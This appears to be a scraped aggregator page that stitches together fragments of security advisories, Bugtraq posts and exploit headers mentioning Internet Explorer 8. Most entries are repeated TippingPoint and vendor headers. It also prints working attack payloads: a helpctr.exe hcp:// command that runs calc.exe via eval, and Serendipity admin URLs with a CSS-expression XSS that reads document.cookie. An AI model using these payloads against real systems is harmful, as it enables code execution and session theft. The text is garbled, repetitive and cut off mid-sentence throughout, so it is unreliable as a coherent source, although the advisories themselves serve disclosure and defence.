<< Previous Next >>
Internet Explorer 8
>>> -----------------------------
>>> URL: http://websecurity.com.ua/4206/
>>> -----------------------------
>>> Affected products: Mozilla Firefox, Internet Explorer 6, Internet
>>> Explorer
>>> 8, Google Chrome, Opera and other browsers.
>>> -----------------------------
>>> Timeline:
>>>
>>> 16.05.2010 - found vulnerability.
>>> 17.05.2010 - disclosed at my site.
>>> -----------------------------
>>> URL: http://websecurity.com.ua/4238/
>>> -----------------------------
>>> Affected products: Mozilla Firefox, Internet Explorer 6, Internet
>>> Explorer
>>> 8, Google Chrome, Opera.
>>> -----------------------------
>>> Timeline:
>>>
>>> 26.05.2010 - found vulnerabilities.
>>> 26.05.2010 - informed developers: Mozilla, Microsoft, Google and Opera.
-- Affected Vendors:
Microsoft
-- Affected Products:
Microsoft Internet Explorer 8
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 9320.
For further product information on the TippingPoint IPS, visit:
-------------------------
Affected products:
-------------------------
Vulnerable versions are Internet Explorer 6 (6.0.2900.2180), Internet
Explorer 7 (7.00.5730.13), Internet Explorer 8 (8.00.6001.18702) and
previous versions.
----------
Details:
----------
-------------------------
Affected products:
-------------------------
Vulnerable versions are Internet Explorer 6 (6.0.2900.2180), Internet
Explorer 7 (7.00.5730.13), Internet Explorer 8 (8.00.6001.18702) and
previous versions.
----------
Details:
----------
> C:\> c:\windows\pchealth\helpctr\binaries\helpctr.exe -url "hcp://system/sysinfo/sysinfomain.htm?svr=<script defer>eval(unescape('Run%28%22calc.exe%22%29'))</script>"
> C:\>
>
> While this is fun, this isn't a vulnerability unless an untrusted third party
> can force you to access it. Testing suggests that by default, accessing an
> hcp:// URL from within Internet Explorer >= 8, Firefox, Chrome (and presumably
> other browsers) will result in a prompt. Although most users will click through
> this prompt (perfectly reasonable, protocol handlers are intended to be safe),
> it's not a particularly exciting attack.
>
> I've found a way to avoid the prompt in a default Windows XP installation in all
-- Affected Vendors:
Microsoft
-- Affected Products:
Microsoft Internet Explorer 8
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 9735.
For further product information on the TippingPoint IPS, visit:
-------------------------
Affected products:
-------------------------
Vulnerable versions are Internet Explorer 6 (6.0.2900.2180), Internet
Explorer 7 (7.00.5730.13), Internet Explorer 8 (8.00.6001.18702) and
previous versions.
----------
Details:
----------
==================
Technical Details:
==================
Successfully tested with Internet Explorer 8
http://<target>/serendipity/serendipity_admin?serendipity[adminModule]=event_display&serendipity[adminAction]=karmalog&serendipity[adminAction]=karmalog&serendipity[adminModule]=event_display&serendipity[filter][entryid]=' stYle='x:expre/**/ssion(alert(document.cookie)) &serendipity[filter][ip]=3&serendipity[filter][title]=3&serendipity[filter][user_agent]=3&serendipity[sort][order]=votetime&serendipity[sort][ordermode]=DESC&submit=-+Go!+-
http://<target>/serendipity/serendipity_admin?serendipity[adminModule]=event_display&serendipity[adminAction]=karmalog&serendipity[adminAction]=karmalog&serendipity[adminModule]=event_display&serendipity[filter][entryid]=3&serendipity[filter][ip]=' stYle='x:expre/**/ssion(alert(document.cookie)) &serendipity[filter][title]=3&serendipity[filter][user_agent]=3&serendipity[sort][order]=votetime&serendipity[sort][ordermode]=DESC&submit=-+Go!+-
Oracle Hyperion Financial Management TList6 ActiveX Control Remote Code Execution Vulnerability
tested against: Internet Explorer 8
Microsoft Windows Server 2003 r2 sp2
download url:
http://www.oracle.com/technetwork/middleware/epm/downloads/index.html
files tested:
SystemInstaller-11121-win32.zip
I've tested this DoS on Internet Explorer 8, does not significantly impact my system.
-----Original Message-----
From: MustLive [mailto:mustlive@websecurity.com.ua]
Sent: Sunday, July 19, 2009 10:33 AM
To: bugtraq@securityfocus.com
Subject: DoS vulnerabilities in Firefox, Internet Explorer, Opera and Chrome
Hello Bugtraq!
-- Affected Vendors:
Microsoft
-- Affected Products:
Microsoft Internet Explorer 8
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 11254.
For further product information on the TippingPoint IPS, visit:
Microsoft
-- Affected Products:
Microsoft Internet Explorer 6
Microsoft Internet Explorer 7
Microsoft Internet Explorer 8
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8653.
For further product information on the TippingPoint IPS, visit:
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
----------------------------------------------
Browser: Internet Explorer 8 (Windows)
Browser: Firefox 3.5 (Windows)
Browser: Safari 4 (Windows)
<!--
Megacubo 5.0.7 (mega://) remote eval() injection exploit
by Nine:Situations:Group::pyrokinesis
site: http://retrogod.altervista.org/
tested against Internet Explorer 8 beta 2/xp sp 3
software site: http://www.megacubo.net/tv/
download url: http://sourceforge.net/project/showfiles.php?group_id=231636&package_id=280849&release_id=608023
description:
> -----------------------------
> URL: http://websecurity.com.ua/4206/
> -----------------------------
> Affected products: Mozilla Firefox, Internet Explorer 6, Internet
> Explorer
> 8, Google Chrome, Opera and other browsers.
> -----------------------------
> Timeline:
>
> 16.05.2010 - found vulnerability.
> 17.05.2010 - disclosed at my site.
Presentations:
- Delivering Identity Management 2.0 by Leveraging OPSS
- Bluepilling the Xen Hypervisor
- Pass the Hash Toolkit for Windows
- Internet Explorer 8 - Trustworthy Engineering and Browsing
- Full Process Reconsitution from Memory
- Hacking Internet Kiosks
- Analysis and Visualization of Common Packers
- A Fox in the Hen House - UPnP IGD
- MoocherHunting
Microsoft
-- Affected Products:
Microsoft Internet Explorer 6
Microsoft Internet Explorer 7
Microsoft Internet Explorer 8
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8654.
For further product information on the TippingPoint IPS, visit:
. Windows Server 2008
5. *Non-vulnerable packages*
. Internet Explorer 8 under Windows 2000/2003/XP/Vista
6. *Vendor Information, Solutions and Workarounds*
The following workarounds can prevent exploitation of the vulnerability:
http://www.tippingpoint.com
- - -- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Internet Explorer 8. User
interaction is required to exploit this vulnerability in that the target
must visit a malicious page or open a malicious file.
The specific flaw exists within how the application verifies arguments
for a certain operation performed on an element. When parsing one of the
-- Affected Vendors:
Microsoft
-- Affected Products:
Microsoft Internet Explorer 7
Microsoft Internet Explorer 8
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 9315.
For further product information on the TippingPoint IPS, visit:
CVE-2011-2379
Bugzilla uses an alternate host for attachments when
viewing them in raw format to prevent cross-site scripting
attacks. This alternate host is now also used when viewing
patches in "Raw Unified" mode because Internet Explorer 8
and older, and Safari before 5.0.6 do content sniffing,
which could lead to the execution of malicious code.
CVE-2011-2380 CVE-201-2979
Sent: Monday, July 20, 2009 10:16 PM
Subject: RE: DoS vulnerabilities in Firefox, Internet Explorer, Opera and
Chrome
> I've tested this DoS on Internet Explorer 8, does not significantly impact
> my system.
>
> -----Original Message-----
> From: MustLive [mailto:mustlive@websecurity.com.ua]
> Sent: Sunday, July 19, 2009 10:33 AM
-- Affected Vendors:
Microsoft
-- Affected Products:
Microsoft Internet Explorer 9
Microsoft Internet Explorer 8
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 11272.
For further product information on the TippingPoint IPS, visit:
III. AFFECTED PRODUCTS
---------------------------
Microsoft Internet Explorer 9
Microsoft Internet Explorer 8
Microsoft Internet Explorer 7
Microsoft Internet Explorer 6
Microsoft Windows 7 for x64-based Systems Service Pack 1
Microsoft Windows 7 for x64-based Systems
by nine:situations:group::pyrokinesis
site: http://retrogod.altervista.org/
software site: http://pack.google.com/intl/it/pack_installer.html
tested against: Internet Explorer 8, windows xp sp3
Internet Explorer 7, windows xp sp3
Google Chrome 2.0.172.43
vulnerability:
through the vulnerable googleapps.url.mailto:// deprecated uri handler, registered as follows:
-- Affected Vendors:
Microsoft
-- Affected Products:
Microsoft Internet Explorer 8
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 9325.
For further product information on the TippingPoint IPS, visit:
>> -----------------------------
>> URL: http://websecurity.com.ua/4238/
>> -----------------------------
>> Affected products: Mozilla Firefox, Internet Explorer 6, Internet
>> Explorer
>> 8, Google Chrome, Opera.
>> -----------------------------
>> Timeline:
>>
>> 26.05.2010 - found vulnerabilities.
>> 26.05.2010 - informed developers: Mozilla, Microsoft, Google and Opera.
-- Affected Vendors:
Microsoft
-- Affected Products:
Microsoft Internet Explorer 8
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 11266.
For further product information on the TippingPoint IPS, visit:
6. *Solutions and Workarounds*
On the server side, you can upgrade to a non-vulnerable version. Onthe
client you can use a browser that obeys the Content-Type header
specified by the server, such as Mozilla Firefox, Google Chrome, Apple
Safari or Opera. Internet Explorer 8 with the XSS Filter won't execute
the malicious scripts.
7. *Credits*
<<Previous Next>>
|
